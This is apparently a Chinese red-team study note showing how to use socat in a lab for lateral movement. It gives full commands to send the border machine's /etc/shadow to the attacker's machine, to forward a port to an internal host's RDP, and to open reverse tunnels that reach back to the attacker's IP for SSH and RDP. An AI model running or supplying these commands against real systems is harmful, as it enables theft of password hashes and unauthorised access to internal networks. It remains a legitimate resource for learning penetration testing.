目錄
0x01 socat介紹
0x02 socat進行文件傳輸
0x03 socat正向端口轉發
0x04 socat反向端口轉發
注:
邊界機器 Ubuntu 192.168.222.177
內網機器 win7 192.168.222.137
0x01 socat介紹
socat我們在前面也已經介紹過了,之前說的是Windows下的利用,如果沒有看到的朋友請移步【socat在Windows下的使用】,socat本身就是在Linux下使用的,非要將它放到Windows下使用難免會有水土不服嘛,這次就回到Linux上來進行socat的使用。
安裝的話,我們可以直接下載安裝的,如果你非要去手動編譯的話,就自行去研究吧。
apt-get install socat
完成后來檢驗一下是否安裝成功
socat -h
0x02 socat進行文件傳輸
首先,我們去邊界機器執行
socat -u /etc/shadow TCP4-LISTEN:55,reuseaddr
然后回到我們本機來下載,這里我本機是Windows的,不過不影響
socat.exe -u TCP4:192.168.222.177:55 OPEN:mima.txt,create
跟之前一樣,在哪里執行create的,文件就在哪里
0x03 socat正向端口轉發
這里,我們通過邊界主機去訪問內網的主機
首先我們去邊界主機執行命令,將來自外部1000的流量全部都轉發到內網機器的3389端口上
socat TCP4-LISTEN:1000,fork TCP4:192.168.222.137:3389
然后我們到本地主機上連接
0x04 socat反向端口轉發
首先,我們在本地執行監聽
socat.exe tcp-listen:1000 tcp-listen:1001
然后,我們在邊緣機器上執行命令
注:10.1.135.96是我本地主機的IP
socat tcp4-connect:10.1.135.96:1000 tcp4:127.0.0.1:22
然后本地連接ssh
當然,直接連接內網的機器也是可以的
socat tcp4-connect:10.1.135.96:1000 tcp4:192.168.222.137:3389
然后回到本地連接遠程桌面
注意,整個過程一定要一氣呵成,如果中間出錯,本地的監聽也需要重新執行,否則將會一直報錯,如果出現問題,多嘗試幾次就好
文章首發公眾號:無心的夢囈(wuxinmengyi)
這是一個記錄紅隊學習、信安筆記,個人成長的公眾號
掃碼關注即可
